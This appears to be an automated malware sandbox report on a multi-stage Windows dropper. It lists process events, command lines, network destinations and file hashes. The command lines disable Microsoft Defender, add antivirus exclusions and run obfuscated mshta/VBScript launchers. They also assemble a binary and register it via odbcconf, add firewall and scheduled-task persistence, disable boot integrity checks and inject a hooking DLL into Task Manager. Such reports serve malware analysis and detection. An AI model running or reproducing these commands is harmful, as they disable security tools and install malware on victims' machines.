PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe

Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe

Wed10d7483856.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe

Wed10a0affb29d.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1015ba90d2.exe

Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a80f141fb08.exe

Wed10a80f141fb08.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe

Wed10520e75c2eb.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe

Wed1095e8d3cef4ec773.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe

Wed10b607271059cb7.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe

Wed103b2f384c2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe

Wed10799545d143108.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp

"C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp" /SL5="$6011C,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe"

C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp" /SL5="$6022E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp" /SL5="$301A8,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if """" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 284

C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp" /SL5="$401D6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "" == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe" ) do taskkill -Im "%~nxJ" /f

C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE

..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Wed10520e75c2eb.exe" /f

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCRiPT: CloSe ( CREaTeObjEcT ( "WsCrIPT.sheLl"). rUN ( "C:\Windows\system32\cmd.exe /q /c COPy /y ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if ""/p0HZ0v12j8OSomYiesvSh7Gq "" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE"" ) do taskkill -Im ""%~nxJ"" /f " , 0 , TRue ) )

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c COPy /y "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ..\r3AxJr.EXE && StArt ..\r3AXJr.ExE /p0HZ0v12j8OSomYiesvSh7Gq & if "/p0HZ0v12j8OSomYiesvSh7Gq " == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE" ) do taskkill -Im "%~nxJ" /f

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241107052120.log C:\Windows\Logs\CBS\CbsPersist_20241107052120.cab

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRipT: clOSE ( CreAteObjEcT ( "WscRIpT.shell" ). ruN ( "CMD.eXe /R Echo | SET /p = ""MZ"" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A { rEgsvR ..\GOwX.SHv } & DEL /Q * ", 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R Echo | SET /p = "MZ" > b01RrZ3N.ZT & CoPY /b /y B01RRZ3N.ZT + s4FCF.WN + YcQIVW._ ..\GOWX.SHv & starT odbcconf /A {rEgsvR ..\GOwX.SHv } & DEL /Q *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>b01RrZ3N.ZT"

C:\Windows\SysWOW64\odbcconf.exe

odbcconf /A {rEgsvR ..\GOwX.SHv }

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe

"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1680

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 fouratlinks.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
US 8.8.8.8:53 webdatingcompany.me udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 tweakballs.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 buy-fantasy-gxmes.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 boomboomrequest.com udp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 trumops.com udp
US 8.8.8.8:53 retoti.com udp
US 8.8.8.8:53 logs.trumops.com udp
US 8.8.8.8:53 logs.retoti.com udp
US 8.8.8.8:53 5db277e5-75ca-4a48-919e-6819660c98de.uuid.trumops.com udp
US 8.8.8.8:53 server6.trumops.com udp
US 44.221.84.105:443 server6.trumops.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 www.google.com udp
DE 49.12.219.50:4846 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 www.yahoo.com udp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 dumancue.com udp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
DE 49.12.219.50:4846 tcp
FI 65.108.69.168:16278 tcp
DE 49.12.219.50:4846 tcp
US 8.8.8.8:53 server6.retoti.com udp
US 44.221.84.105:443 server6.retoti.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 2AZZARITA.hopto.org udp
US 44.209.47.121:50001 2AZZARITA.hopto.org tcp
DE 49.12.219.50:4846 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

\Users\Admin\AppData\Local\Temp\7zS078C18A6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2848-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2848-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2848-71-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2848-70-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2848-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe

MD5 6d8ff7889acdcfd9f785e073e6ab4f4d
SHA1 5a878803d1c355fae35d684f59f26c1b4a838e6c
SHA256 8e50b8cdea9a829fe00a3d81bad328f6f76581d20ba9cc8cf6d8642d0aa882c7
SHA512 fcb23c40e31839402927dc1cdecf750d4c32c609f42337741f400069c8763599ad6604ed9d7fd86d7d6ee7d6f7b4eca7d132ceb5796f2dad99223e619897b3ab

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe

MD5 5eec35ae4619a7992130f13f66b03002
SHA1 47141ead2a1166234970c3dba5821cee57ddbb4d
SHA256 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
SHA512 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe

MD5 d60755a29f9dc368fe71fbadf96b640c
SHA1 d3ac47604f6d91cbc76d9013ba9b3c779f69ad27
SHA256 1129ef957be36f46c5ba500a3f48a237069006b699d570360f876f6c186a7606
SHA512 7dadfa4c0401e688ef0ab6f2c5b175f4943243bd97c4310f0f0bbb9fd7f096e80993ea4e9d598109ee6d0436ff2331d485966c831054960cf62ce97b58102c8a

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe

MD5 0426dbe3753b2d07d3612fceb824a182
SHA1 4f28da2d30710389cabf10385cb8dc5cbf4be74a
SHA256 6fbe7d2d78413b54c593100e706e727f771714e2fa1b584bdc57836b1bd44d60
